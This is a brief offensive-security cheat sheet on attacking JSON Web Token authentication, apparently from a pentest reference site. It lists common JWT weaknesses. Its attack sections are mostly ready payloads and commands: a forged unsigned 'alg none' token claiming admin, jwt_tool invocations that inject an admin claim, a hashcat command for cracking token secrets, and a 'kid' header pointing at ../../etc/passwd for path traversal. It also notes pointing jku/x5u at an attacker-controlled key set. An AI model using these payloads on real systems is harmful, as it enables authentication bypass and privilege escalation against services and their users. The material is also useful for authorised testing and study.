High Severity | A03
🎫 JWT Attack Techniques
🧠 Description
JSON Web Token (JWT) attacks exploit vulnerabilities in token handling, signing algorithms, and validation logic to bypass authentication, escalate privileges, or forge tokens.
Common JWT Weaknesses:
- Algorithm None: Accept unsigned tokens
- Algorithm Confusion: RS256 to HS256 switch
- Weak Keys: Public key as HMAC secret
- No Validation: Accept expired tokens
💣 Attack Techniques
# Algorithm None # Change alg to "none" and remove signature eyJhbGciOiJub25lIiwiYWxnIjoibm9uIn0.eyJ1c2VyIjoiYWRtaW4ifQ. # Algorithm Confusion (RS256 to HS256) # Get public key from JWKS endpoint # Use as HMAC secret to sign token # jwt_tool usage python3 jwt_tool.py-T python3 jwt_tool.py -I -Hc admin -pd '{"sub":"admin"}' # hashcat for brute force hashcat -m 16500 jwt.txt wordlist.txt
🛡️ Authentication Bypass
# Modify user claim
# Change {"sub":"user"} to {"sub":"admin"}
# Time-based attacks
# Remove exp claim or set far future date
# jku/x5u manipulation
# Point to attacker-controlled JWKS
# kid injection
# kid: "../../etc/passwd"
# Use for path traversal in key lookup
# Key ID Injection
{"alg":"HS256","typ":"JWT","kid":"../../etc/passwd"}
🛠️ Tools
# jwt.io - online decoder/debugger # https://jwt.io/ # jwt_tool python3 jwt_tool.py eyJ... -T python3 jwt_tool.py eyJ... -I -Hvp "admin" # Burp JWT Editor extension # Decode, modify, sign with known key